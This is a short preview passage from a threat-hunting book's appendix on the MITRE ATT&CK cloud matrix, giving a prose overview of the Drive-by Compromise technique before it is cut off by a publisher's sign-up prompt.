APPENDIX GMITRE Cloud Matrix
The tactics and techniques covered in this appendix represent the MITRE ATT&CK Matrix for Enterprise covering cloud-based techniques. The Matrix contains information for the following platforms: Azure AD, Office 365, Google Workspace, SaaS, IaaS. Figure G.1 shows the framework.
Refer to https://attack.mitre.org/matrices/enterprise/cloud/ for the latest information.
Initial Access
Drive-by Compromise
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring access to an application token. Multiple ways of delivering exploit code to a browser exist, including:
- A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
- Malicious ads are paid for and served through legitimate ad providers.
Figure G-1: MITRE ATT&CK Framework Cloud Matrix
- Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g., forum posts, comments, and other user-controllable web content).
Often the website used ...
Get Threat Hunting in the Cloud now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
